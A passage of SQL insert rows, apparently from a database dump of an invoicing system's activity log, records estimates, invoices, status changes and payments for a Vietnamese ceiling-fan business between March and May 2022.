(385, 'estimate', 36, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-28 10:18:27'),
(386, 'invoice', 73, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-28 10:20:03'),
(387, 'estimate', 36, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/73\">INV-67-22</a>\";}', '1', 'Ho Gia Phat', '2022-03-28 10:20:03'),
(388, 'estimate', 37, 'estimate_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-28 14:59:15'),
(389, 'invoice', 61, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-28 16:05:04'),
(390, 'invoice', 61, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-03-28 16:05:04'),
(391, 'invoice', 61, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-28 16:05:31'),
(392, 'invoice', 61, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"935.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/62\" target=\"_blank\">#62</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-28 16:05:31'),
(393, 'invoice', 65, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-28 16:07:02'),
(394, 'invoice', 65, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"300.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/63\" target=\"_blank\">#63</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-28 16:07:02'),
(395, 'invoice', 74, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-28 16:19:20'),
(396, 'invoice', 72, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-03-29 09:18:51'),
(397, 'invoice', 72, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-03-29 09:18:51'),
(398, 'invoice', 75, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-29 10:02:55'),
(399, 'invoice', 75, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-29 11:59:41'),
(400, 'invoice', 75, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.440.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/64\" target=\"_blank\">#64</a>\";}', '3', 'Tổ chức đào tạo WIT Sale', '2022-03-29 11:59:41'),
(401, 'invoice', 59, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-03-29 14:18:57'),
(402, 'estimate', 38, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-03-30 15:09:03'),
(403, 'estimate', 38, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:37:\"Quạt trần cánh lớn Essence 3m \";i:1;s:36:\"Quạt trần cánh lớn Essence 3m\";}', '1', 'Ho Gia Phat', '2022-03-30 15:09:46'),
(404, 'invoice', 76, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-03-30 15:09:51'),
(405, 'estimate', 38, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/76\">INV-73-22</a>\";}', '1', 'Ho Gia Phat', '2022-03-30 15:09:51'),
(406, 'invoice', 76, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:12:\"150000000.00\";i:1;s:8:\"13636364\";}', '1', 'Ho Gia Phat', '2022-03-30 15:30:58'),
(407, 'invoice', 76, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"13636364.00\";i:1;s:12:\"136363637.00\";}', '1', 'Ho Gia Phat', '2022-03-30 15:42:23'),
(408, 'estimate', 38, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:12:\"150000000.00\";i:1;s:9:\"136363637\";}', '1', 'Ho Gia Phat', '2022-03-30 16:31:24'),
(409, 'invoice', 7, 'invoice_activity_applied_credits', 'a:2:{i:0;s:13:\"11.120.000 đ\";i:1;s:10:\"CN-2022/10\";}', '1', 'Ho Gia Phat', '2022-03-31 16:12:48'),
(410, 'invoice', 7, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-03-31 16:12:48'),
(411, 'invoice', 76, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-04-01 09:03:22'),
(412, 'invoice', 76, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"75.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/65\" target=\"_blank\">#65</a>\";}', '1', 'Ho Gia Phat', '2022-04-01 09:03:22'),
(413, 'invoice', 76, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:17:\"cskh@hogiaphat.vn\";}', '1', 'Ho Gia Phat', '2022-04-01 09:03:30'),
(414, 'invoice', 73, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-01 09:04:10'),
(415, 'invoice', 73, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:16:\"15.000.000,40 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/66\" target=\"_blank\">#66</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-01 09:04:10'),
(416, 'invoice', 72, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-04-01 13:57:48'),
(417, 'invoice', 72, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.725.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/67\" target=\"_blank\">#67</a>\";}', '1', 'Ho Gia Phat', '2022-04-01 13:57:48'),
(418, 'invoice', 75, 'invoice_activity_added_attachment', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-04-02 10:34:57'),
(419, 'invoice', 77, 'invoice_activity_created', '', '3', 'Tổ chức đào tạo WIT Sale', '2022-04-04 15:41:48'),
(420, 'invoice', 77, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-05 08:40:06'),
(421, 'invoice', 77, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-05 08:40:25'),
(422, 'invoice', 77, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"600.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/68\" target=\"_blank\">#68</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-05 08:40:25'),
(423, 'estimate', 37, 'estimate_activity_client_declined', '', NULL, '', '2022-04-05 20:39:00'),
(424, 'estimate', 39, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-06 14:28:17'),
(425, 'invoice', 78, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-07 13:59:51'),
(426, 'estimate', 30, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/78\">INV-75-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-07 13:59:51'),
(427, 'invoice', 78, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-07 14:00:01'),
(428, 'invoice', 78, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.600.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/69\" target=\"_blank\">#69</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-07 14:00:01'),
(429, 'invoice', 79, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:04:58'),
(430, 'estimate', 39, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/79\">INV-76-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:04:58'),
(431, 'estimate', 39, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:50:\"Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:06:00'),
(432, 'estimate', 39, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:50:\"Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:06:00'),
(433, 'invoice', 79, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:07:01'),
(434, 'invoice', 79, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"850.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/70\" target=\"_blank\">#70</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:07:01'),
(435, 'estimate', 40, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:11:21'),
(436, 'invoice', 80, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:11:34'),
(437, 'estimate', 40, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/80\">INV-77-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:11:34'),
(438, 'invoice', 80, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:11:45'),
(439, 'invoice', 80, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"850.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/71\" target=\"_blank\">#71</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-08 11:11:45'),
(440, 'estimate', 41, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-10 08:01:52'),
(441, 'estimate', 42, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-11 06:27:42'),
(442, 'estimate', 42, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-04-11 06:28:22'),
(443, 'estimate', 42, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-04-11 15:31:14'),
(444, 'invoice', 81, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-12 11:17:02'),
(445, 'estimate', 42, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/81\">INV-78-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-12 11:17:02'),
(446, 'invoice', 81, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-14 09:08:15'),
(447, 'invoice', 81, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.250.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/72\" target=\"_blank\">#72</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-14 09:08:15'),
(448, 'estimate', 43, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-16 09:22:30'),
(449, 'estimate', 43, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"35800000.00\";i:1;s:8:\"82000000\";}', '1', 'Ho Gia Phat', '2022-04-16 09:45:14'),
(450, 'estimate', 43, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:254:\"Sải cánh 132cm<br />\r\nTiêu chuẩn: Outdoor (không phù hợp môi trường muối biển)<br />\r\nMàu cánh: Cocoa Woodgrain Aluminum<br />\r\nMàu Thân: Black<br />\r\nMóc treo: Universal<br />\r\nThương hiệu/Xuất xứ: Big Ass Fans/USA<br />\r\n\";i:1;s:216:\"Sải cánh 132cm\r\nTiêu chuẩn: Outdoor (không phù hợp môi trường muối biển)\r\nMàu cánh: Cocoa Woodgrain Aluminum\r\nMàu Thân: Black\r\nMóc treo: Universal\r\nThương hiệu/Xuất xứ: Big Ass Fans/USA\";}', '1', 'Ho Gia Phat', '2022-04-16 09:45:14'),
(451, 'estimate', 44, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-16 11:06:56'),
(452, 'invoice', 82, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-04-16 11:07:02'),
(453, 'estimate', 44, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/82\">INV-79-22</a>\";}', '1', 'Ho Gia Phat', '2022-04-16 11:07:02'),
(454, 'invoice', 82, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-18 09:01:23'),
(455, 'invoice', 82, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.175.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/73\" target=\"_blank\">#73</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-18 09:01:23'),
(456, 'estimate', 45, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-18 09:50:56'),
(457, 'invoice', 83, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-18 09:56:45'),
(458, 'estimate', 45, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/83\">INV-80-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-18 09:56:45'),
(459, 'estimate', 46, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-18 14:15:33'),
(460, 'invoice', 84, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-04-18 14:15:37'),
(461, 'estimate', 46, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/84\">INV-81-22</a>\";}', '1', 'Ho Gia Phat', '2022-04-18 14:15:37'),
(462, 'invoice', 84, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-04-18 14:16:58'),
(463, 'invoice', 84, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/74\" target=\"_blank\">#74</a>\";}', '1', 'Ho Gia Phat', '2022-04-18 14:16:58'),
(464, 'invoice', 83, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-18 14:54:09'),
(465, 'invoice', 83, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"450.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/75\" target=\"_blank\">#75</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-18 14:54:09'),
(466, 'estimate', 47, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-19 09:01:40'),
(467, 'estimate', 47, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"400000.00\";i:1;s:9:\"500000.00\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-19 15:12:02'),
(468, 'estimate', 47, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:47:\"Phí gia cố làm móc treo trần thạch cao\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-19 15:12:02'),
(469, 'invoice', 85, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-19 15:12:08'),
(470, 'estimate', 47, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/85\">INV-82-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-19 15:12:08'),
(471, 'estimate', 47, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-19 16:20:24'),
(472, 'invoice', 85, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-19 16:20:56'),
(473, 'invoice', 85, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-20 16:35:42'),
(474, 'invoice', 85, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.175.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/76\" target=\"_blank\">#76</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-20 16:35:42'),
(475, 'estimate', 48, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-21 12:03:03'),
(476, 'estimate', 48, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6800000.00\";i:1;s:1:\"0\";}', '1', 'Ho Gia Phat', '2022-04-21 12:03:21'),
(477, 'invoice', 86, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-04-22 16:31:15'),
(478, 'invoice', 86, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-22 16:35:18'),
(479, 'invoice', 86, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.800.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/77\" target=\"_blank\">#77</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-22 16:35:18'),
(480, 'invoice', 87, 'invoice_activity_created', '', '9', 'Ky Thuat HGP', '2022-04-24 10:41:45'),
(481, 'invoice', 87, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:8:\"65000.00\";i:1;s:7:\"6500000\";}', '9', 'Ky Thuat HGP', '2022-04-24 10:44:42'),
(482, 'estimate', 49, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-24 14:38:28'),
(483, 'estimate', 50, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-25 10:59:11'),
(484, 'estimate', 50, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-25 11:03:37'),
(485, 'invoice', 88, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-25 11:03:41'),
(486, 'estimate', 50, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/88\">INV-84-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-25 11:03:41'),
(487, 'invoice', 89, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-04-25 16:11:57'),
(488, 'invoice', 89, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"88000000.00\";i:1;s:7:\"8800000\";}', '1', 'Ho Gia Phat', '2022-04-25 16:12:12'),
(489, 'invoice', 90, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-26 08:56:42'),
(490, 'invoice', 90, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-26 08:56:42'),
(491, 'estimate', 48, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/90\">INV-85-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-26 08:56:42'),
(492, 'estimate', 51, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-04-27 09:41:48'),
(493, 'invoice', 91, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-04-27 09:41:54'),
(494, 'estimate', 51, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/91\">INV-86-22</a>\";}', '1', 'Ho Gia Phat', '2022-04-27 09:41:55'),
(495, 'invoice', 91, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-04-27 09:43:00'),
(496, 'invoice', 91, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/78\" target=\"_blank\">#78</a>\";}', '1', 'Ho Gia Phat', '2022-04-27 09:43:00'),
(497, 'invoice', 92, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-04-27 11:25:12'),
(498, 'invoice', 92, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:83:\"Chi phí nhân công lắp đặt quạt làm mát treo trần + chi phí vật tư\";}', '1', 'Ho Gia Phat', '2022-04-27 11:26:53'),
(499, 'estimate', 48, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:17:\"Sải cánh 150cm\";}', '1', 'Ho Gia Phat', '2022-04-27 15:19:49'),
(500, 'estimate', 52, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-28 09:48:00'),
(501, 'invoice', 93, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-28 09:53:24'),
(502, 'estimate', 52, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/93\">INV-88-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-28 09:53:24'),
(503, 'estimate', 53, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-29 11:49:48'),
(504, 'invoice', 94, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-04-29 11:51:03'),
(505, 'estimate', 53, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/94\">INV-89-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-29 11:51:03'),
(506, 'invoice', 93, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-29 14:59:35'),
(507, 'invoice', 93, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.100.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/79\" target=\"_blank\">#79</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-29 14:59:35'),
(508, 'invoice', 74, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-29 15:05:59'),
(509, 'invoice', 74, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.146.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/80\" target=\"_blank\">#80</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-04-29 15:05:59'),
(510, 'invoice', 55, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2022-05-02 07:57:59'),
(511, 'invoice', 55, 'user_sent_overdue_reminder', 'a:2:{i:0;s:44:\"<custom_data>duy.ld@rollvn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-05-02 07:58:05'),
(512, 'invoice', 76, 'user_sent_overdue_reminder', 'a:2:{i:0;s:44:\"<custom_data>cskh@hogiaphat.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-05-02 07:58:10'),
(513, 'invoice', 94, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-03 08:54:56'),
(514, 'invoice', 94, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.750.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/81\" target=\"_blank\">#81</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-03 08:54:56'),
(515, 'estimate', 54, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-05-04 11:14:16'),
(516, 'estimate', 55, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-05-04 13:50:17'),
(517, 'estimate', 56, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-04 17:10:03'),
(518, 'invoice', 95, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-04 17:18:21'),
(519, 'estimate', 56, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/95\">INV-90-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-04 17:18:21'),
(520, 'invoice', 95, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-06 15:02:46'),
(521, 'invoice', 95, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.800.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/82\" target=\"_blank\">#82</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-06 15:02:46'),
(522, 'invoice', 96, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-05-06 16:37:33'),
(523, 'invoice', 96, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-05-06 16:38:04'),
(524, 'invoice', 96, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.225.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/83\" target=\"_blank\">#83</a>\";}', '1', 'Ho Gia Phat', '2022-05-06 16:38:04'),
(525, 'invoice', 97, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-07 14:16:14'),
(526, 'invoice', 97, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-07 14:16:36'),
(527, 'invoice', 97, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"150.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/84\" target=\"_blank\">#84</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-07 14:16:36'),
(528, 'estimate', 37, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-05-08 09:40:53'),
(529, 'invoice', 76, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-05-08 09:43:44'),
